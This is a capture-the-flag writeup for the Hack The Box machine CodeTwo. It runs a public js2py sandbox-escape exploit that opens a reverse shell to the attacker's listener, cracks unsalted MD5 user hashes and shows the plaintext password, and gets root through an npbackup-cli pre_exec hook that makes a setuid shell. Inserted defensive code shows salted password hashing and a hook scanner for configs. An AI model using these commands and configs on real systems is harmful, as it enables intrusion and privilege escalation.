CodeTwo


1. Foothold

1.1. port scan

┌──(root㉿kali)-[~/Desktop/htb/codetwo]
└─# nmap 10.10.11.82 -p- --min-rate 10000
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-19 10:45 EDT
Warning: 10.10.11.82 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.11.82
Host is up (0.18s latency).
Not shown: 65445 closed tcp ports (reset), 88 filtered tcp ports (no-response)
PORT     STATE SERVICE
22/tcp   open  ssh
8000/tcp open  http-alt

Nmap done: 1 IP address (1 host up) scanned in 38.64 seconds
                                                                                                  
┌──(root㉿kali)-[~/Desktop/htb/codetwo]
└─# nmap 10.10.11.82 -p 22,8000 -sCV
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-19 11:13 EDT
Nmap scan report for 10.10.11.82
Host is up (0.066s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 a0:47:b4:0c:69:67:93:3a:f9:b4:5d:b3:2f:bc:9e:23 (RSA)
|   256 7d:44:3f:f1:b1:e2:bb:3d:91:d5:da:58:0f:51:e5:ad (ECDSA)
|_  256 f1:6b:1d:36:18:06:7a:05:3f:07:57:e1:ef:86:b4:85 (ED25519)
8000/tcp open  http    Gunicorn 20.0.4
|_http-title: Welcome to CodeTwo
|_http-server-header: gunicorn/20.0.4
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.04 seconds

1.2. dirsearch

1.3. web

Register and log in.

Same routine as Code again, it seems: you are given a website where you can write and execute code. I tried a few common functions and none of them would execute.

1.4. app code review

After downloading, it turns out to be the website's source code.

Looking through it, you can see a number of imported packages; the relatively new one that stands out is the js2py package, which has a CVE.

js2py is a popular Python package that executes JavaScript code inside the Python interpreter. Various web crawlers use it to parse the JavaScript found on websites.
A flaw in how js2py implements its internal global variables lets an attacker obtain a reference to a Python object inside the js2py environment, escape the JS sandbox, and execute arbitrary commands on the host.
It is a remote code execution.

Go straight for an exploit.
GitHub - harutomo-jp/CVE-2024-28397-RCE
Conveniently there is a ready-made RCE exploit less than a day old.

Too good, brother, what else is there to say? Just fire it.

git clone https://github.com/harutomo-jp/CVE-2024-28397-RCE
python CVE-2024-28397-RCE.py 10.10.11.82 /run_code --local_ip 10.10.14.44 --local_port 4444


2. User

2.1. database & hash crack

┌──(root㉿kali)-[~/…/home/app/app/instance]
└─# sqlite3 users.db
SQLite version 3.46.1 2024-08-13 09:16:08
Enter ".help" for usage hints.
sqlite> .tables
code_snippet  user        
sqlite> SELECT * FROM user;
1|marco|649c9d65a206a75f5abe509fe128bce5
2|app|a97588c0e2fa3a024876339e27aeb42e
3|'|3590cb8af0bbb9e78c343b52b93773c9
sqlite> SELECT * FROM  code_snippet ;
2|4|const meet = "hello";

console.log(meet)
┌──(root㉿kali)-[~/…/home/app/app/instance]
└─# echo -n '649c9d65a206a75f5abe509fe128bce5' |wc -c
32

Most likely MD5.
Two credentials:

marco sweetangelbabylove
' '
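The reason those two hashes fell so quickly is the storage scheme itself: a bare 32-hex-character digest with no salt and no work factor, so each wordlist candidate costs one md5() call. The following is an added example (not code from the writeup or the CodeTwo application) that shows the check an unsalted-MD5 login performs next to the salted PBKDF2-HMAC-SHA256 scheme the app should have used. The sample digest is constructed (the MD5 of "hello"), and the `pbkdf2_sha256$iterations$salt$digest` storage format is my own convention, not something the app defines.

```python
import hashlib
import hmac
import os
from typing import Optional

# Constructed sample with the same shape as the users.db rows:
# 32 hex characters, no salt, no algorithm prefix. It is md5("hello").
SAMPLE_HASH = hashlib.md5(b"hello").hexdigest()

HEX_DIGITS = set("0123456789abcdef")


def looks_like_unsalted_md5(stored: str) -> bool:
    """True if a stored value has the shape of a bare MD5 digest."""
    return len(stored) == 32 and set(stored.lower()) <= HEX_DIGITS


def verify_md5(password: str, stored: str) -> bool:
    """How a bare-MD5 scheme checks a login: one fast digest, no salt.

    Every candidate costs a single md5() call and identical passwords
    always produce identical digests, which is what makes a wordlist
    attack against a dumped table cheap."""
    digest = hashlib.md5(password.encode("utf-8")).hexdigest()
    return hmac.compare_digest(digest, stored)


# Hardened alternative from the standard library: random per-user salt
# plus a deliberately expensive key derivation.
PBKDF2_ITERATIONS = 600_000


def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    """Derive a salted PBKDF2-HMAC-SHA256 record for storage.

    A fresh 16-byte salt is drawn per call, so hashing the same password
    twice yields two different records."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ITERATIONS)
    return f"pbkdf2_sha256${PBKDF2_ITERATIONS}${salt.hex()}${dk.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Re-derive with the stored salt and iteration count, compare in constant time."""
    parts = stored.split("$")
    if len(parts) != 4 or parts[0] != "pbkdf2_sha256":
        return False  # unknown or malformed record (a bare MD5 row lands here)
    _, iterations, salt_hex, dk_hex = parts
    dk = hashlib.pbkdf2_hmac(
        "sha256", password.encode("utf-8"), bytes.fromhex(salt_hex), int(iterations)
    )
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    print("sample row looks like unsalted MD5:", looks_like_unsalted_md5(SAMPLE_HASH))
    record = hash_password("hello")
    print("hardened record:", record)
    print("verifies:", verify_password("hello", record))
```

A migration path for an app in this state is to verify incoming logins against the old MD5 row once, then overwrite the row with the PBKDF2 record on success, so the weak digests disappear as users log in.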


3. root

marco@codetwo:~$ sudo -l
Matching Defaults entries for marco on codetwo:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User marco may run the following commands on codetwo:
    (ALL : ALL) NOPASSWD: /usr/local/bin/npbackup-cli

npbackup-cli is a restic-based backup tool. Its configuration file can define pre-exec and post-exec hooks, which run external commands before and after the backup operation. It also supports a stdin_from_command parameter, which feeds the output of an external command in as the data to back up.

Using the config in the home directory as a reference, create an npbackup config file, npbackup-config.yaml:

conf_version: 3.0.1
repos:
  default:
    repo_uri: file:///tmp/backup-repo
    repo_group: exploit_group
    backup_opts:
      paths:
        - /tmp
      source_type: folder_list
      exclude_files_larger_than: 0.0
    repo_opts:
      repo_password: yourpassword
      retention_policy: {}
      prune_max_unused: 0
    prometheus: {}
    env: {}
    is_protected: false
groups:
  exploit_group:
    backup_opts:
      paths: []
      source_type: folder_list
      stdin_from_command: []
      stdin_filename: 
      tags: []
      compression: auto
      use_fs_snapshot: false  # disabled to keep things simple (no VSS needed)
      ignore_cloud_files: true
      one_file_system: false
      priority: low
      exclude_caches: true
      excludes_case_ignore: false
      exclude_files: []
      exclude_patterns: []
      exclude_files_larger_than: 0
      additional_parameters: []
      additional_backup_only_parameters: []
      minimum_backup_size_error: 10 MiB
      pre_exec_commands:
        - /bin/sh -c "cp /bin/sh /tmp/rootsh && chown root:root /tmp/rootsh && chmod 4777 /tmp/rootsh"
      pre_exec_per_command_timeout: 3600
      pre_exec_failure_is_fatal: false
      post_exec_commands: []
      post_exec_per_command_timeout: 3600
      post_exec_failure_is_fatal: false
      post_exec_execute_even_on_backup_error: true
      post_backup_housekeeping_percent_chance: 0
      post_backup_housekeeping_interval: 0
    repo_opts:
      repo_password: 
      repo_password_command: 
      minimum_backup_age: 1440
      upload_speed: 0
      download_speed: 0
      backend_connections: 0
      retention_policy: {}
      prune_max_unused: 0 B
      prune_max_repack_size: 
    prometheus:
      backup_job: exploit_job
      group: exploit_group
    env:
      env_variables: {}
      encrypted_env_variables: {}
    is_protected: false
identity:
  machine_id: exploit_id
  machine_group: 
global_prometheus:
  metrics: false
  instance: exploit_instance
  destination: 
  http_username: 
  http_password: 
  additional_labels: {}
  no_cert_verify: false
global_options:
  auto_upgrade: false
  auto_upgrade_percent_chance: 5
  auto_upgrade_interval: 15
  auto_upgrade_server_url: 
  auto_upgrade_server_username: 
  auto_upgrade_server_password: 
  auto_upgrade_host_identity: exploit_id
  auto_upgrade_group: 

Initialize the repository:

sudo -u root /usr/local/bin/npbackup-cli --init --config /tmp/npbackup-config.yaml --repo-name default

Run the backup as root, which triggers the hook:

sudo -u root /usr/local/bin/npbackup-cli -b --config /tmp/npbackup-config.yaml --repo-name default
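The sudo rule is the real defect here: it lets marco pass any --config path, so every command-bearing key in the file (pre_exec_commands, post_exec_commands, stdin_from_command, repo_password_command) runs as root. Below is an added example, not code from npbackup or the writeup, of the check a defender would run before allowing a user-supplied config under such a rule. It is a line-based scanner for those four keys so it needs no YAML library; the key names come from the config above, and the two config fragments are constructed for the demo (the hostile one reuses the hook line from the config above, the clean one leaves every hook empty).

```python
import re

# Keys in an npbackup config whose values are executed as external commands.
# Names are taken from the config file above; I assume no other spellings.
HOOK_KEYS = (
    "pre_exec_commands",
    "post_exec_commands",
    "stdin_from_command",
    "repo_password_command",
)
# Values that mean "no command configured" in the generated configs.
EMPTY_VALUES = {"", "[]", "null", "~", "''", '""'}

KEY_RE = re.compile(r"^(\s*)(" + "|".join(HOOK_KEYS) + r")\s*:\s*(.*?)\s*$")
ITEM_RE = re.compile(r"^(\s*)-\s+(.*?)\s*$")


def audit_npbackup_config(text):
    """Return (line_no, key, command) for every hook that would run a command.

    Handles the three shapes npbackup's own configs use: a scalar value,
    an empty flow list ([]), and a block sequence of '- item' lines that
    follows an empty scalar. Anything else is reported verbatim."""
    findings = []
    lines = text.splitlines()
    i = 0
    while i < len(lines):
        m = KEY_RE.match(lines[i])
        if not m:
            i += 1
            continue
        indent, key, value = len(m.group(1)), m.group(2), m.group(3)
        value = value.split(" #", 1)[0].strip()  # drop a trailing YAML comment
        if value not in EMPTY_VALUES:
            findings.append((i + 1, key, value))
            i += 1
            continue
        # Empty scalar: collect the more-indented block items that follow it.
        j = i + 1
        while j < len(lines):
            item = ITEM_RE.match(lines[j])
            if not item or len(item.group(1)) <= indent:
                break
            findings.append((j + 1, key, item.group(2)))
            j += 1
        i = j
    return findings


def hook_free(text):
    """True when the config defines no command hooks at all."""
    return not audit_npbackup_config(text)


# Constructed fragment mirroring the hook section of the config above.
HOSTILE_CONFIG = """\
groups:
  exploit_group:
    backup_opts:
      stdin_from_command: []
      pre_exec_commands:
        - /bin/sh -c "cp /bin/sh /tmp/rootsh && chown root:root /tmp/rootsh && chmod 4777 /tmp/rootsh"
      pre_exec_per_command_timeout: 3600
      post_exec_commands: []
    repo_opts:
      repo_password: secret
      repo_password_command:
"""

# Constructed fragment with every hook left empty.
CLEAN_CONFIG = """\
groups:
  default_group:
    backup_opts:
      stdin_from_command: []
      pre_exec_commands: []
      post_exec_commands: []
    repo_opts:
      repo_password: secret
      repo_password_command:
"""

if __name__ == "__main__":
    for line_no, key, command in audit_npbackup_config(HOSTILE_CONFIG):
        print(f"line {line_no}: {key} runs: {command}")
    print("clean config hook-free:", hook_free(CLEAN_CONFIG))
```

Scanning alone is not a complete fix: the durable remediation is a sudoers entry that names a root-owned config path explicitly instead of the bare binary, so the user cannot substitute a file of their own. The scanner is useful as a CI or pre-deploy gate for whatever config root does run.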


Very easy: a 6, plus 0.5 for originality.